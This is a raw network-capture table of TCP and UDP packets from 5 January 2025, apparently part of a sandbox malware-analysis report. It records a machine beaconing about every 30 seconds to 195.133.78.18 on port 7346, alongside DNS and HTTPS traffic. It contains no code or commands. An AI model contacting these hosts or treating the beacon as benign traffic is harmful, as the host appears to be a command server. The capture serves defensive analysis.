                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268831015 CET4434990323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268865108 CET49882443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268902063 CET49903443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268918037 CET4434988223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268965960 CET49882443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.311345100 CET4434992952.182.143.209192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.315324068 CET4434992852.182.143.209192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.840475082 CET4434992952.182.143.209192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.840583086 CET4434992952.182.143.209192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.840615034 CET49929443192.168.2.652.182.143.209
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.840724945 CET49929443192.168.2.652.182.143.209
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:32.021576881 CET4434992852.182.143.209192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:32.021645069 CET49928443192.168.2.652.182.143.209
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:33.691534042 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:33.692945004 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:33.697776079 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.209378004 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.209400892 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.209692955 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.210402966 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.210416079 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.992122889 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.992188931 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.995003939 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.995007992 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.995208025 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.997626066 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.997776985 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.997781992 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.998065948 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:45.043319941 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:45.175399065 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:45.175623894 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:45.175704002 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:45.224436045 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:45.224450111 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:03.709636927 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:03.711074114 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:03.715913057 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.046772957 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.046813011 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.046886921 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.047480106 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.047494888 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.844692945 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.844800949 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.846646070 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.846656084 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.846995115 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.848747015 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.848805904 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.848809958 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.848926067 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.891339064 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:10.023135900 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:10.023257017 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:10.023317099 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:10.023658037 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:10.023675919 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:14.185838938 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:14.497963905 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:15.107368946 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:16.310467958 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:18.716705084 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:23.529225111 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:33.138616085 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:33.701237917 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:33.705523968 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:33.710359097 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:34.340082884 CET50070443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:34.340127945 CET4435007040.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:34.340229988 CET50070443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:34.341183901 CET50070443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:34.341198921 CET4435007040.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.119945049 CET4435007040.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.120047092 CET50070443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.121982098 CET50070443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.121994019 CET4435007040.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.122243881 CET4435007040.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.126198053 CET50070443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.126260996 CET50070443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.126267910 CET4435007040.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.126409054 CET50070443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.171349049 CET4435007040.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.296415091 CET4435007040.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.296506882 CET4435007040.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.296591997 CET50070443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.296724081 CET50070443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:35.296736956 CET4435007040.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:37.092303038 CET49703443192.168.2.640.126.31.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:37.092499971 CET4970480192.168.2.62.22.50.144
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:37.099656105 CET4434970340.126.31.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:37.099685907 CET80497042.22.50.144192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:37.099726915 CET49703443192.168.2.640.126.31.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:37.099776983 CET4970480192.168.2.62.22.50.144
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:39.560652971 CET49707443192.168.2.640.126.31.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:39.565761089 CET4434970740.126.31.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:39.565815926 CET49707443192.168.2.640.126.31.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:03.714183092 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:03.715432882 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:03.720242023 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:05.427143097 CET50071443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:05.427185059 CET4435007140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:05.427299023 CET50071443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:05.427851915 CET50071443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:05.427864075 CET4435007140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.234708071 CET4435007140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.234796047 CET50071443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.236996889 CET50071443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.237006903 CET4435007140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.237294912 CET4435007140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.239255905 CET50071443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.239319086 CET50071443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.239324093 CET4435007140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.239476919 CET50071443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.287337065 CET4435007140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.414709091 CET4435007140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.414879084 CET4435007140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.415018082 CET50071443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.415322065 CET50071443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:06.415354013 CET4435007140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:33.725090027 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:33.779376030 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:33.788414955 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:33.793817997 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:43.459842920 CET50072443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:43.459880114 CET4435007240.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:43.460103035 CET50072443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:43.460751057 CET50072443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:43.460764885 CET4435007240.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.238512993 CET4435007240.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.238580942 CET50072443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.241179943 CET50072443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.241203070 CET4435007240.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.241436005 CET4435007240.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.244553089 CET50072443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.244632959 CET50072443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.244642973 CET4435007240.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.244818926 CET50072443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.291323900 CET4435007240.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.415024042 CET4435007240.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.415108919 CET4435007240.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.415277958 CET50072443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.415442944 CET50072443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:41:44.415465117 CET4435007240.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:03.742320061 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:03.795165062 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:03.798773050 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:03.803663969 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:33.765372992 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:33.766760111 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:33.775393009 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:36.387902021 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:36.387954950 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:36.388022900 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:36.389002085 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:36.389015913 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.197725058 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.197915077 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.199596882 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.199609995 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.199836969 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.201719999 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.201781034 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.201786995 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.201916933 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.243334055 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.376821995 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.377005100 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.377549887 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.378082037 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.378103971 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.378115892 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:43:03.776518106 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:43:03.777743101 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:43:03.782552004 CET734649709195.133.78.18192.168.2.6

                                                                                                                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.094419956 CET6505653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.103199005 CET53650561.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:09.390531063 CET53620421.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:09.686348915 CET53611561.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.745419979 CET5553253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.745877981 CET5266753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.752696037 CET53555321.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.753057003 CET53526671.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:14.120784998 CET53654751.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.521956921 CET5695953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.522469997 CET5981353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.529534101 CET53598131.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:18.635132074 CET6486053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:18.635308027 CET6431353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:20.631700993 CET5420053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:20.631850958 CET6209153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:20.638356924 CET53542001.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:20.639090061 CET53620911.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.416404009 CET5147353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.416938066 CET5698253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.417450905 CET6454953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.417597055 CET6381353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.423577070 CET53514731.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.428286076 CET53638131.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.428302050 CET53569821.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.428312063 CET53645491.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.430783987 CET5275853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.431101084 CET6277453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.438819885 CET53527581.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.438851118 CET53627741.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.113091946 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.417120934 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.554722071 CET64317443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.574285984 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.574335098 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.574347019 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.576387882 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.578800917 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.579152107 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.579798937 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.580182076 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.580307007 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.580523014 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.674334049 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.674393892 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.674402952 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.674411058 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.674418926 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.674978971 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.675065041 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.676145077 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.676824093 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.676939964 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.677306890 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.677337885 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.677804947 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.678268909 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.770565987 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.796011925 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:24.862478018 CET64317443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.000643969 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.000658989 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.000792980 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.000804901 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.001394987 CET64317443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.003272057 CET64317443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.003411055 CET64317443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.003643036 CET64317443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.003741026 CET64317443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.098828077 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.098843098 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.098850965 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.098860025 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.099412918 CET64317443192.168.2.6172.64.41.3
